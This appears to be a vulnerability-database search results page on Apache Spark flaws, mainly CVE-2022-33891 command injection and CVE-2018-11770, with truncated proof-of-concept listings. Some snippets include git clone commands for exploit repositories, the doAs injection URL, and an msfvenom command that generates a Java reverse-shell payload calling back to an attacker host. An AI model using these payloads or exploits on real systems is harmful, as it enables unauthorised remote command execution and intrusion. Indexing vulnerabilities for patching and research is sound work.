Lucene search
+L

301 matches found

Kitploit
Kitploit
added 2026/09/13 5:20 p.m.7 views

Apache-spark-CVE-2022-33891

Apache-spark-CVE-2022-33891 Apache Spark RCE - CVE-2022-33891 PoC 关注我们 Vulnmachines平台 YouTube Twitter Facebook LinkedIn...

8.8CVSS8AI score0.93076EPSS
SaveExploits12
Nuclei
Nuclei
added 2026/09/13 4:24 p.m.91 views

Apache Spark - Authentication Bypass

In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication spark.authenticate via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even...

9.8CVSS7.5AI score0.2937EPSS
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/13 2:34 p.m.5 views

CVE-2022-33891

CVE-2022-33891 - Vulnerabilidad de Inyección de Comandos en Apache Spark ⚠️ Solo con fines educativos y de investigación de seguridad autorizada Autores del Exploit Original Muy agradecido al autor original del PoC AkbarTrilaksana Descripción La interfaz de usuario de Apache Spark ofrece la...

8.8CVSS7.9AI score0.93076EPSS
SaveExploits12References1
Kitploit
Kitploit
added 2026/09/13 1:59 p.m.6 views

HELK

HELK Hunting ELK(简称 HELK)是首批具备高级分析功能的开源狩猎平台之一,它通过 Jupyter 笔记本和 Apache Spark 在 ELK 堆栈之上提供了 SQL 声明式语言、图形化、结构化流处理乃至机器学习等高级分析能力。该项目最初主要为研究而开发,但由于其灵活的设计和核心组件,在配置得当且基础设施具有可扩展性的情况下,也可以部署在更大规模的环境中。 目标 为社区提供一个开源的狩猎平台,并分享威胁狩猎的基础知识。 加快狩猎平台的部署时间。 以更简单、更经济的方式改进狩猎用例的测试与开发。 通过 Apache Spark、GraphFrames 和 Jupyter...

5.9AI score
SaveExploits0References6
Kitploit
Kitploit
added 2026/09/13 1:25 p.m.8 views

CVE-2022-33891

CVE-2022-33891 概念验证 针对CVE-2022-33891的概念验证,支持设置自定义载荷。 默认情况下不易受攻击 -- 需要将 spark.acls.enable 设置为 TRUE。 预期用途 此脚本的使用仅限于被授权在目标主机上运行载荷以进行漏洞修补的人员。运行此脚本前,请确保您已获得授权。 使用 root@kitploit: git clone https://github.com/west-wind/CVE-2022-33891.git python cve-2022-33891.py 开始使用 此POC期望以CSV文件输入所有目标,文件名为 allTargets.c...

8.8CVSS8AI score0.93076EPSS
SaveExploits12References1
Kitploit
Kitploit
added 2026/09/13 5:37 a.m.11 views

CVE-2018-11770

CVE-2018-11770 Apache Spark 未授权反向 Shell RCE 基于 该 Metasploit 模块 重写的独立 Python 3 RCE 漏洞利用程序 漏洞利用 POC 在此说明。利用代码本身 在此解释。 在 Python 3.7 环境下 对该目标 进行了测试。 使用方法: root@kitploit: root@Kali:/Infosec/RubyStuff/Apache-Spark-RCE msfvenom -p java/shellreversetcp LHOST=192.168.92.134 LPORT=4444 -f jar -o...

4.9CVSS6.1AI score0.6583EPSS
SaveExploits2References2
Kitploit
Kitploit
added 2026/09/12 1:54 p.m.6 views

CVE-2022-33891

「💥」CVE-2022-33891 描述 Apache Spark UI 提供了通过配置选项 spark.acls.enable 启用 ACL 的可能性。配合身份验证过滤器,该功能会检查用户是否具有查看或修改应用程序的访问权限。如果 ACL 已启用,HttpSecurityFilter 中的某条代码路径可能允许攻击者通过提供任意用户名来执行冒充操作。恶意用户随后可能能够访问一个权限检查函数,该函数最终会根据其输入构建一个 Unix shell 命令并执行它。这将导致以 Spark 当前运行的用户身份执行任意 shell 命令。此漏洞影响 Apache Spark 3.0.3...

8.8CVSS8AI score0.93076EPSS
SaveExploits12References1
Kitploit
Kitploit
added 2026/09/11 10:31 p.m.5 views

lab_security_apache_spark_emulation_detection

此存储库没有 README。...

5.8AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/11 5:03 p.m.7 views

spark-exploit

Arbitary Code Execution in Unsecured Apache Spark Cluster How to Exploit Follow the below steps: root@kitploit: $ git clone https://github.com/akhld/spark-exploit.git $ cd spark-exploit Remote Code Execution Open exploit.scala, Replace the following code with whatever you want to get executed!...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/11 3:21 p.m.5 views

cve-2022-33891

CVE-2022-33891 Apache Spark Shell 命令注入漏洞 一个用于利用 Apache Spark Shell 命令注入漏洞的 Python POC。我看到网上有些其他 POC 看起来很可疑。这个简单且干净。 我并未发现此漏洞/利用方式。我只是想为社区制作一个安全的 POC ^.^ 影响版本 Apache Spark 3.0.3 及更早版本、3.1.1 至 3.1.2 版本、3.2.0 至 3.2.1 版本 漏洞组件 root@kitploit: http://localhost:8080/?doAs=命令注入位置 示例 root@kitploit:...

8.8CVSS7.8AI score0.93076EPSS
SaveExploits12References1
Kitploit
Kitploit
added 2026/09/09 10:36 a.m.7 views

CVE-2022-33891-EXPLOIT

CVE-2022-33891 - Apache Spark UI 远程代码执行(RCE)🔐 Apache Spark UI 容易受到远程命令注入漏洞(编号为 CVE-2022-33891)的影响。该缺陷源于对用户身份验证和访问控制处理不当,尤其是在启用访问控制列表(ACL)时。当通过 spark.acls.enable 配置选项启用 ACL 时,身份验证过滤器应验证用户是否拥有查看或修改应用程序所需的权限。然而,HttpSecurityFilter 中存在一个漏洞,允许攻击者通过提供任意用户名进行冒充。 漏洞详情 🛠 启用 ACL 后,HttpSecurityFilter...

8.8CVSS7.9AI score0.93076EPSS
SaveExploits12
Kitploit
Kitploit
added 2026/09/09 10:26 a.m.7 views

cve-2022-33891

CVE-2022-33891 Apache Spark Shell 命令注入漏洞 一个用于利用 Apache Spark Shell 命令注入漏洞的 Python POC。我看到其他一些 POC,但看起来非常可疑。这一个干净又简单。 我并未发现此漏洞/利用方法。我只是想为社区制作一个安全的 POC ^.^ CVE 最初由 Databricks 的 Kostya Kortchinsky 发现。 更新于 2022年9月7日:哟,现在有了一个 Metasploit 模块!由 h00die-gr3y 制作,并且已经 合并! 受影响版本 Apache Spark 版本 3.0.3 及更早版本、版本...

8.8CVSS7.9AI score0.93076EPSS
SaveExploits12References3
Kitploit
Kitploit
added 2026/09/09 9:40 a.m.8 views

CVE-2022-33891

CVE-2022-33891 Apache Spark 漏洞利用。 作者 : Dr.Linux 此漏洞利用程序可在 Python 3.7 及更高版本中运行。...

8.8CVSS7.8AI score0.93076EPSS
SaveExploits12References1
OSV
OSV
added 2026/09/08 8:20 a.m.5 views

BIT-SPARK-2026-32773 Apache Spark: XSS Vulnerability in Spark Web 3.5.4

There is a lack of XSS escaping in the Spark History Server prior to 3.5.8 which allows a malicious Spark job to generate arbitrary unescaped frontend code which could lead to a minimal privilege escalation in browser. Users are encouraged to upgrade to Spark 3.5.8 or later. This CVE is marked as...

6.1CVSS0.00667EPSS
SaveExploits0References3
Nuclei
Nuclei
added 2026/09/07 6:34 a.m.135 views

Apache Spark UI - Remote Command Injection

Apache Spark UI is susceptible to remote command injection. ACLs can be enabled via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilte...

8.8CVSS8AI score0.93076EPSS
SaveExploits12References5
OSV
OSV
added 2026/09/02 10:51 a.m.6 views

CVE-2026-32773 Apache Spark: XSS Vulnerability in Spark Web 3.5.4

There is a lack of XSS escaping in the Spark History Server prior to 3.5.8 which allows a malicious Spark job to generate arbitrary unescaped frontend code which could lead to a minimal privilege escalation in browser. Users are encouraged to upgrade to Spark 3.5.8 or later. This CVE is marked as...

6.1CVSS5.9AI score
SaveExploits0References5
Cvelist
Cvelist
added 2026/09/02 10:51 a.m.38 views

CVE-2026-32773 Apache Spark: XSS Vulnerability in Spark Web 3.5.4

There is a lack of XSS escaping in the Spark History Server prior to 3.5.8 which allows a malicious Spark job to generate arbitrary unescaped frontend code which could lead to a minimal privilege escalation in browser. Users are encouraged to upgrade to Spark 3.5.8 or later. This CVE is marked as...

0.00667EPSS
SaveExploits0References1
CVE
CVE
added 2026/09/02 10:51 a.m.11 views

CVE-2026-32773

Apache Spark History Server (web UI) is vulnerable to a cross-site scripting (XSS) flaw caused by insufficient output escaping prior to version 3.5.8 . A user with the ability to launch a Spark job can inject arbitrary unescaped frontend code into the history server's web pages, leading to a mini...

6.1CVSS6AI score0.00667EPSS
SaveExploits0References2Affected Software1
Circl
Circl
added 2026/09/01 8:01 p.m.8 views

CVE-2021-24901

creationtimestamp| type| source ---|---|--- 2026-09-01 20:01:56+00:00| seen| https://t.me/hackingAttack/42050 2026-09-02 01:02:17+00:00| seen| https://t.me/hackingAttack/42050 2026-09-06 10:00:06+00:00| published-proof-of-concept| https://t.me/hackingAttack/42050 2026-09-07 01:00:24+00:00|...

4.8CVSS5.6AI score0.05063EPSS
SaveExploits5References1
Circl
Circl
added 2026/08/27 4:00 p.m.11 views

CVE-2019-14974

creationtimestamp| type| source ---|---|--- 2026-08-27 16:00:03+00:00| seen| Telegram/tjdPFWmK8d3uOic7fBL4SWiO2RjxR5x57I46YuEU7JS4U 2026-08-28 00:00:36+00:00| seen| Telegram/tjdPFWmK8d3uOic7fBL4SWiO2RjxR5x57I46YuEU7JS4U...

6.1CVSS5.8AI score0.28433EPSS
SaveExploits2
Rows per page
Query Builder